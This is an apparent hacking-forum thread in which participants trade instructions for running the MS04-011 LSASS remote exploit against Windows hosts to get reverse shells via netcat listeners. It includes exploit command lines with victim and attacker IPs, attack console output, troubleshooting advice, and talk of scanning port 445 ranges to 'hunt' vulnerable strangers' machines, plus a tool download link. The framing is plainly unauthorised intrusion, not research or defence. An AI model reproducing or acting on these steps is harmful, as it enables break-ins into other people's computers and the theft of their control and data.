FIRST STEP:

Open a cmd.Exe, browse to your netcat dir and type : nc.exe -l -p "the port that will open on your computer"

SECOND STEP:

Open an other cmd.exe, browse to exploit, and then type : "name of the exploit.exe" "0, 1, depending the vic os" "Vic's ip" "the port that you opened seconds before with the nc.exe" "your ip"

If you're able to connect to his port 445 (most of the time, it's ok), then you should get something coming in your first cmd.exe, the one in which you opened a port thanks to nc.exe

I hope this help "a bit" those who aren't used to "reverse" exploit

thnks Macsou i'll test it in my machines...

nthg special happening...same shellcode size 316 and ret value 1726 all the time...
getting no shell.....any more suggestions

Run your own thread if you have probs, this doesnt match the topic.

This exploit is almost dead, everyone´s patched

Still many shells here..

Happy hunting ;-)

@o0oKARo0o
this exploit is alive and kickin'
i'm still getting a few *good* vuln targets every day

Damn, guys, where are we? In Offtopic?

EXPLOiTED wants to know if there is a commandline scanner for LSASS and I think it wasnt his intention to start another newbielike-"I dont get a shell, shall i reboot my PC to get it to work?"-Thread.
I mean guys, when you want some help, ask your mom but when you want to contribute and help this guy post something here! Else: RTFM!

My two cents...

Ps: Sorry, no dont know a commandline scanner either, and I would like to know too if there is one.

the link isnt working..can anyone give another one?

thnx in advance,

AsD10

check that site, they have some interesting stuff
http://www.mosbatonline.com/hck/download.htm

now it s dead

god damn, who did the translation at this site...
seems another altavista translate job

Can we get back on topic... CMDLiNE SCANNER... i have Dsscan, i have scanned ports 139 445 (METALHEAD), that doesnt help... i dont feel like re-scanning those ranges once again when i find the ones with those ports open... METALHEAD.. anywho... can we get back on topic, just ion case someone reads this and says "OMFG Wtf are these morons babbling about" when they could be like "ooooh cmdline scanner ----> link" and id be happy

yes
MERKiN

METALHEAD :-P

ive certianly not found a cmd line scanner anywhere, but im sure there is great need for 1.. ill keep looking,... can only hope!

Anybody can upload the Rlsasrv Exploit from the first site of this thread for me please! thnx! or mail me: g33k@mail.ru

@first use remote a commandline scantool like scan500 or sl.exe to make a simple portscan for port 445, next check the fitting results locally via dsscan.

that's my way.

In the vuln resultz, you may find ~10 Percent which are dropping a shell, depends on installed windows version ;o)

Good luck.

can anyone upload Rlsasrv.zip ? i have other one doesnt seems to work

whats the problem:

C:\lsass>RLsasrv.exe 0 attackip 666 myip
Create NULL session failed
shellcode size 316
Ret value = 58

o_O

lsass ist shit all system is patch !!!!!

cmd1:

c:\>exploit 0 192.168.0.2 4444 192.168.0.1
MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---

[*] Target: IP: 192.168.0.2: OS: WinXP Professional [universal] lsass.exe
[*] Connecting to 192.168.0.2:445 ... OK
[*] Attacking ... OK

-------------------------------------------------------------

cmd2:
nc -l -p 4444

-------------------------------------------------------------

Then what? Why in cmd2 nothing happens?
I have firewall turned off.

Put netcatt to listen on port first and then use the sploit . ALso its possible that machine isnt vulnerable /

first

CMD1:

C:\>nc -vv -l -p 21
listening on [any] 21 ...

-----------------------------------------------------------------------

CMD2:

C:\>exploit 2 192.168.0.2 21 192.168.0.1

MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---

[*] Target: IP: 192.168.0.2: OS: Win2k Advanced Server [SP4] netrap.dll

[*] Connecting to 192.168.0.2:445 ... OK
[*] Attacking ... OK

C:\>

-----------------------------------------------------------------------

CMD3:


C:\>nc -vv -l -p 21
listening on [any] 21 ...

-----------------------------------------------------------------------

Still no response...

Just gotta keep trying, you'll get one.

I thought I was doing it wrong at first cause I wasn't getting shells, but after a while I got one that worked.

Don't forget about the -t option that will check the OS. Then you can choose accordingly to the OS.

Laters...

Also this might be of help...

Searching around I find this: